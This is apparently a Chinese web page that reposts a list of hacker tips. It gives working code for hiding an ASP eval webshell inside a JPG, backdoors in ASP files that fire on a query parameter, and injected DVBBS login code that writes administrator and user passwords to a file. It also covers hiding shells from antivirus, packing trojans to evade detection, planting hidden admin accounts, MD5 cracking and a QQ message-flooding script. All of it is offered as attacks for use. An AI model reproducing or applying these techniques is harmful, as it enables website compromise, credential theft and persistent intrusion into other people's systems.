客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#) ) </SCRIPT> 2. 名称:整蛊网吧 先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享, 复制一个木马过去运行即可。 3.名称:感受MD5暴力破解的魅力 rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all" 1和7代表密码最小和最大长度 阿汀我再加个方法:http://md5.rednoize.com/ 在线破解 或者到http://www.md5lookup.com/?category=01-3&;searck=on 4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳 的时候最好多选择不知名的加壳软件 5.名称:隐蔽的插入型ASP木马 (1)在我们要做手脚的asp文件里加入如下内容 <%if request("action")="ok" then%> shell代码插在这里,最好是小马,还要加密一下 <%end if%> 访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法,在我们要做手脚的asp文件里加入如下内容 <% on error resume next strFileName = Request.QueryString("filer") set objStream = Server.createObject("ABODB.Stream") objStream.Type = 1 objStream.Open objStream.LoadFromFile strFileName objStream.SaveToFile Server.mappath("ating.asp"),2 %> 访问的时候在做手脚的asp文件后面加上?filer=XXX XXX为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp (3)前提得到system权限, 进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的 访问http://网站/s…/ating.asp即可 6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为: hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的 7.名称:QQ群脚本攻击 打开qq对话诓,复制消息,然后 下面的内容保存为.vbs 文件,运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 9. 名称:全面找出你站上的ASP木马 (1) 用杀毒软件 (2) 用FTP客户端软件,点"工具"->"比较文件夹" (3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马 (4) 用工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画 (1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样 老办法: 修改admin_login.asp得到明文DVBBS后台密码 在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台,在目录下就生成了laner.txt (2)login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间,用户名和密码 (3)如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: <%if request("n")<>"" and request("p")<>"" then on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing end if%> |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
六六分期app的软件客服如何联系?不知道吗?加qq群【895510560】即可!标题:六六分期
今天小编告诉大家如何处理win10系统火狐flash插件总是崩溃的问题,可能很多用户都不知
今天小编告诉大家如何对win10系统删除桌面回收站图标进行设置,可能很多用户都不知道
今天小编告诉大家如何对win10系统电脑设置节能降温的设置方法,想必大家都遇到过需要
我们在使用xp系统的过程中,经常需要对xp系统无线网络安装向导设置进行设置,可能很多
今天小编告诉大家如何处理win7系统玩cf老是与主机连接不稳定的问题,可能很多用户都不
电脑对日常生活的重要性小编就不多说了,可是一旦碰到win7系统设置cf烟雾头的问题,很
我们在日常使用电脑的时候,有的小伙伴们可能在打开应用的时候会遇见提示应用程序无法
今天小编告诉大家如何对win7系统打开vcf文件进行设置,可能很多用户都不知道怎么对win
今天小编告诉大家如何对win10系统s4开启USB调试模式进行设置,可能很多用户都不知道怎
请发表评论